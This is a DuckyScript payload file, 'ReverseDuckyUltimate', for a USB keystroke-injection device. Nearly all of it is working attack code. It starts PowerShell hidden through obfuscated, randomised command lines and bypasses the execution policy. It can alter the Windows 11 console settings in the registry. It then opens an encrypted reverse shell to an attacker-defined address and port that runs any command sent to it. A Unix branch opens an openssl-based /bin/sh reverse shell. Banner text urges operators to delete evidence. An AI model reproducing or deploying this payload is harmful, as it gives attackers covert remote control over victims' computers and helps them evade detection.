Path: blob/master/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
REM ReverseDuckyUltimate1REM Version 1.32REM OS: Windows / Unix3REM Author: 0i41E4REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum5REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed.67REM Extension PASSIVE_WINDOWS_DETECT by Korben for best and fastest deployment with guard rails8EXTENSION PASSIVE_WINDOWS_DETECT9REM VERSION 1.110REM AUTHOR: Korben1112REM_BLOCK DOCUMENTATION13Windows fully passive OS Detection and passive Detect Ready14Includes its own passive detect ready.15Does not require additional extensions.1617USAGE:18Extension runs inline (here)19Place at beginning of payload (besides ATTACKMODE) to act as dynamic20boot delay21$_OS will be set to WINDOWS or NOT_WINDOWS22See end of payload for usage within payload23END_REM2425REM CONFIGURATION:26DEFINE #MAX_WAIT 15027DEFINE #CHECK_INTERVAL 2028DEFINE #WINDOWS_HOST_REQUEST_COUNT 229DEFINE #NOT_WINDOWS 73031$_OS = #NOT_WINDOWS3233VAR $MAX_TRIES = #MAX_WAIT34WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))35DELAY #CHECK_INTERVAL36$MAX_TRIES = ($MAX_TRIES - 1)37END_WHILE38IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN39$_OS = WINDOWS40END_IF4142REM_BLOCK EXAMPLE USAGE AFTER EXTENSION43IF ($_OS == WINDOWS) THEN44STRING HELLO WINDOWS!45ELSE46STRING HELLO WORLD!47END_IF48END_REM49END_EXTENSION5051REM Extension ROLLING_POWERSHELL_EXECUTION by 0i41E to obfuscate the start of Powershell52EXTENSION ROLLING_POWERSHELL_EXECUTION53REM VERSION 1.054REM Author: 0i41E55REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek56REM Requirements: PayloadStudio v.1.3 minimum57REM Starts Powershell in uncommon ways to avoid basic detection58REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.5960REM CONFIGURATION:61REM Add ExecutionPolicy bypass62DEFINE #EXECUTIONPOLICY FALSE63DEFINE #DELAY 
2006465$_RANDOM_MIN = 166$_RANDOM_MAX = 1667VAR $RANDOM_PS = $_RANDOM_INT68FUNCTION Rolling_Powershell_Execution()69IF ($RANDOM_PS == 1) THEN70STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"71ELSE IF ($RANDOM_PS == 2) THEN72STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"73ELSE IF ($RANDOM_PS == 3) THEN74STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"75ELSE IF ($RANDOM_PS == 4) THEN76STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"77ELSE IF ($RANDOM_PS == 5) THEN78STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"79ELSE IF ($RANDOM_PS == 6) THEN80STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"81ELSE IF ($RANDOM_PS == 7) THEN82STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"83ELSE IF ($RANDOM_PS == 8) THEN84STRING powershell -NoPro -noninT -win h85ELSE IF ($RANDOM_PS == 9) THEN86STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"87ELSE IF ($RANDOM_PS == 2) THEN88STRING powershell.exe -NoP -nOni -W h89ELSE IF ($RANDOM_PS == 10) THEN90STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"91ELSE IF ($RANDOM_PS == 11) THEN92STRING powershell -nopr -noninT -W HiddEn93ELSE IF ($RANDOM_PS == 12) THEN94STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"95ELSE IF ($RANDOM_PS == 13) THEN96STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"97ELSE IF ($RANDOM_PS == 14) THEN98STRING powershell -noproF -noni -W Hi99ELSE IF ($RANDOM_PS == 15) THEN100STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"101ELSE ($RANDOM_PS == 16) THEN102STRING powershell.exe -noP -nOnI -windo H103END_IF104105IF_DEFINED_TRUE #EXECUTIONPOLICY106SPACE107IF (($RANDOM_PS % 2) == 0) THEN108STRING -ep ByPasS109ELSE IF (($RANDOM_PS % 5) == 0) 
THEN110STRING -exec bypass111ELSE IF (($RANDOM_PS % 7) == 0) THEN112STRING -exeC byPasS113ELSE IF (($RANDOM_PS % 10) == 0) THEN114STRING -exEcUtionPoL bYpaSs115ELSE IF (($RANDOM_PS % 12) == 0) THEN116STRING -exEcUtion bYPaSs117ELSE118STRING -eP BYPaSs119END_IF120END_IF_DEFINED121ENTER122DELAY #DELAY123END_FUNCTION124REM EXAMPLE USAGE AFTER EXTENSION125REM DELAY 2000126REM GUI r127REM DELAY 2000128REM Rolling_Powershell_Execution()129END_EXTENSION130131EXTENSION DETECT_FINISHED132REM VERSION 1.0133REM AUTHOR: 0i41E134135REM_BLOCK DOCUMENTATION136USAGE:137Use the function Detect_Finished() to signal the finished execution of your payload.138END_REM139140REM CONFIGURATION:141DEFINE #PAUSE 150142FUNCTION Detect_Finished()143IF ($_CAPSLOCK_ON == FALSE)144CAPSLOCK145DELAY #PAUSE146CAPSLOCK147DELAY #PAUSE148CAPSLOCK149DELAY #PAUSE150CAPSLOCK151ATTACKMODE OFF152ELSE IF153CAPSLOCK154DELAY #PAUSE155CAPSLOCK156DELAY #PAUSE157CAPSLOCK158ATTACKMODE OFF159END_IF160END_FUNCTION161END_EXTENSION162163EXTENSION WINDOWS11_CONSOLE_DOWNGRADE164REM_BLOCK165Version: 1.0166Author: 0i41E167Description: Downgrade the default command prompt of Windows 11 to use Conhost again.168Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.169END_REM170171REM CONFIGURATION:172REM Used to wait until initial execution173DEFINE #INPUT_WAIT 2000174REM GUID for using the legacy console host for terminal execution175DEFINE #CONHOST B23D10C0-E52E-411E-9D5B-C09FDF709C7D176177FUNCTION Console_Downgrade()178DELAY #INPUT_WAIT179GUI r180DELAY 500181STRINGLN powershell -NoP -NonI182DELAY 1000183STRING Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationConsole -Value "{#CONHOST}";184STRINGLN Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationTerminal -Value "{#CONHOST}";exit185END_FUNCTION186187REM_BLOCK188EXAMPLE USAGE AFTER EXTENSION: Downgrade the command prompt via registry, then open a hidden PS instance and execute 
Calc.exe.189Console_Downgrade()190DELAY 2000191GUI r192DELAY 2000193STRINGLN powershell -w h194DELAY 1500195STRINGLN calc.exe;exit196END_REM197END_EXTENSION198199REM Define the attackers IP, Port and Identifier200DEFINE #ADDRESS '0.0.0.0'201DEFINE #PORT 4444202DEFINE #IDENTIFIER Ducky203REM Automatic setup requires openssl!204DEFINE #SETUP FALSE205REM Turn on when target uses Windows 11 - Helps to hide Powershell206DEFINE #WINDOWS11 FALSE207208REM Automatic setup and start listener - Requires openssl!209IF_DEFINED_TRUE #SETUP210IF ($_OS == #NOT_WINDOWS) THEN211DELAY 1500212STRINGLN echo "Setting up Infrastructre - Do not interact!"213DELAY 1000214STRINGLN openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && echo "Setup complete! Starting listener on Port #PORT " && openssl s_server -quiet -key key.pem -cert cert.pem -port #PORT215ELSE216DELAY 1500217GUI r218DELAY 1000219STRINGLN notepad.exe220DELAY 250221STRING Setup requires an unix based machine with openssl installed!222END_IF223ELSE_DEFINED224IF ($_OS == WINDOWS) THEN225226REM Pseudo random variables for layer one polymorphism227VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE228VAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE229VAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE230VAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE231VAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE232VAR $var_gIbberish5 = $_RANDOM_UPPER_LETTER_KEYCODE233VAR $var_gibberish6 = $_RANDOM_NUMBER_KEYCODE234VAR $var_gibBerish1 = $_RANDOM_NUMBER_KEYCODE235236REM Layer two polymorphism237VAR $RANDOM_LAYER = $_RANDOM_INT238239REM Polymorphism function240FUNCTION Polymorphism()241IF (($RANDOM_LAYER % 2) == 0) THEN242STRING $243INJECT_VAR $var_gibberish244INJECT_VAR $var_gibberish2245INJECT_VAR $var_gibberish3246INJECT_VAR $var_gibberish3247INJECT_VAR $var_gibberish4248INJECT_VAR $var_gIbberish5249ELSE IF (($RANDOM_LAYER % 6) == 0) THEN250STRING $251INJECT_VAR $var_gibberish252INJECT_VAR $var_gibberish2253INJECT_VAR 
$var_gibberish254INJECT_VAR $var_gibberish3255INJECT_VAR $var_gibberish4256INJECT_VAR $var_gibberish257ELSE258STRING $259INJECT_VAR $var_gibberish4260INJECT_VAR $var_gibberish261INJECT_VAR $var_gibberish2262INJECT_VAR $var_gibberish3263INJECT_VAR $var_gibberish264INJECT_VAR $var_gibberish4265END_IF266END_FUNCTION267268REM Polymorphism function269FUNCTION Polymorphism2()270IF (($RANDOM_LAYER % 6) == 0) THEN271STRING $272INJECT_VAR $var_gibberish273INJECT_VAR $var_gibberish2274INJECT_VAR $var_gibberish3275INJECT_VAR $var_gibberish3276INJECT_VAR $var_gibberish4277INJECT_VAR $var_gIbberish5278INJECT_VAR $var_gIbberish5279ELSE IF (($RANDOM_LAYER % 9) == 0) THEN280STRING $281INJECT_VAR $var_gibberish282INJECT_VAR $var_gIbberish5283INJECT_VAR $var_gibberish2284INJECT_VAR $var_gibberish285INJECT_VAR $var_gibberish3286INJECT_VAR $var_gibberish4287INJECT_VAR $var_gibberish288ELSE289STRING $290INJECT_VAR $var_gibberish4291INJECT_VAR $var_gibberish292INJECT_VAR $var_gibberish2293INJECT_VAR $var_gibberish3294INJECT_VAR $var_gibberish6295INJECT_VAR $var_gibberish4296INJECT_VAR $var_gIbberish5297END_IF298END_FUNCTION299300REM Polymorphism function301FUNCTION Polymorphism3()302IF (($RANDOM_LAYER % 1) == 0) THEN303STRING $304INJECT_VAR $var_gibberish305INJECT_VAR $var_gibberish2306INJECT_VAR $var_gIbberish5307ELSE IF (($RANDOM_LAYER % 8) == 0) THEN308STRING $309INJECT_VAR $var_gibberish310INJECT_VAR $var_gIbberish5311INJECT_VAR $var_gibberish312ELSE313STRING $314INJECT_VAR $var_gibberish4315INJECT_VAR $var_gibberish316INJECT_VAR $var_gIbberish5317END_IF318END_FUNCTION319320REM Polymorphism function321FUNCTION Polymorphism4()322IF (($RANDOM_LAYER % 1) == 0) THEN323STRING $324INJECT_VAR $var_gIbberish5325INJECT_VAR $var_gibberish326INJECT_VAR $var_gibberish2327INJECT_VAR $var_gibb3rish328ELSE IF (($RANDOM_LAYER % 8) == 0) THEN329STRING $330INJECT_VAR $var_gibBerish1331INJECT_VAR $var_gibberish332INJECT_VAR $var_gIbberish5333INJECT_VAR $var_gibberish334ELSE335STRING $336INJECT_VAR 
$var_gibberish6337INJECT_VAR $var_gibberish4338INJECT_VAR $var_gibberish339INJECT_VAR $var_gIbberish5340END_IF341END_FUNCTION342343REM Connection Message344FUNCTION Quack_Slogan()345IF (($RANDOM_LAYER % 2) == 0) THEN346STRING "[!] Quack you $env:USERNAME/$env:COMPUTERNAME! `n[?] Opsec Tip: Use environment variables.`n`n"347ELSE IF (($RANDOM_LAYER % 3) == 0) THEN348STRING "[!] $env:USERNAME/$env:COMPUTERNAME got found a flash drive... `n[?] Considere converting IPs to decimal (e.g. 127.0.0.1 = 2130706433)`n`n"349ELSE IF (($RANDOM_LAYER % 4) == 0) THEN350STRING "[!] $env:USERNAME/$env:COMPUTERNAME compromised by #IDENTIFIER `n[+] Ducks > D0lphins!`n`n"351ELSE IF (($RANDOM_LAYER % 6) == 0) THEN352STRING "[!] Quack Attack on $env:USERNAME/$env:COMPUTERNAME `n[+] Sometimes it is better to wait...Be patient!`n`n"353ELSE IF (($RANDOM_LAYER % 8) == 0) THEN354STRING "[!] Established remote access on $env:USERNAME/$env:COMPUTERNAME `n[?] Watch out for powershell -v 2!`n`n"355ELSE IF (($RANDOM_LAYER % 9) == 0) THEN356STRING "[!] $env:USERNAME/$env:COMPUTERNAME messed with the Duck `n[?] Remember to delete evidence.`n`n"357ELSE358STRING "[!] $env:USERNAME/$env:COMPUTERNAME says Quack! 
`n[+]...and then he waddled away...`n`n"359END_IF360END_FUNCTION361362REM Downgrades the Console, if Windows 11 is set to TRUE363IF_DEFINED_TRUE #WINDOWS11364Console_Downgrade()365DELAY 2000366END_IF_DEFINED367GUI r368DELAY 500369Rolling_Powershell_Execution()370DELAY 1000371Polymorphism()372STRING =[Text.Encoding]::UTF8.GetBytes(373Quack_Slogan()374STRING );375Polymorphism2()376REM Section were Address & Port get reflected377STRING =New-Object Net.Sockets.TcpClient( #ADDRESS , #PORT );378STRING $s=379Polymorphism2()380STRING .GetStream();381STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));382STRING $sSL.AuthenticateAsClient('madeby.0i41E', $null, "Tls12", $false);383Polymorphism3()384STRING =new-object System.IO.StreamWriter($sSL);385STRING $sSL.write(386Polymorphism()387STRING ,0,388Polymorphism()389STRING .Length);390Polymorphism3()391STRING .Write('392REM Identifier393STRING #IDENTIFIER394STRING @PS '+(&('g'+'l'))+'> ');395Polymorphism3()396STRING .flush();[byte[]]397Polymorphism4()398STRING = 0..65535|%{0};while(($i=$sSL.Read(399Polymorphism4()400STRING , 0,401Polymorphism4()402STRING .Length)) -ne 0){$D=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(403Polymorphism4()404STRING ,0, $i);405STRING $Y=(iex $D | Out-String ) 2>&1;$X=$Y + '406REM Identifier407STRING #IDENTIFIER408STRING @PS ' + (Get-LoCatIon).Path + '> ';409STRING $Z=([text.encoding]::UTF8).GetBytes($X);$sSL.Write($Z,0,$Z.Length);410STRING $sSL.Flush()};exit411DELAY 250412ENTER413REM Indicator of successful execution414Detect_Finished()415ELSE416REM Executing reverse shell when inserted into non-windows box417REM Non-ideal solution for opening terminal (But should work for most unix distros)418DELAY 2000419INJECT_MOD COMMAND420DELAY 2000421STRING terminal422DELAY 500423ENTER424DELAY 1000425STRINGLN which screen >/dev/null && which openssl >/dev/null && screen -md sh -c 'mkfifo /tmp/s; /bin/sh -i < /tmp/s 
2>&1 | openssl s_client -quiet -connect #ADDRESS:#PORT > /tmp/s; rm /tmp/s'426DELAY 1000427STRINGLN exit428REM Indicator of successful execution429Detect_Finished()430END_IF431END_IF_DEFINED432433434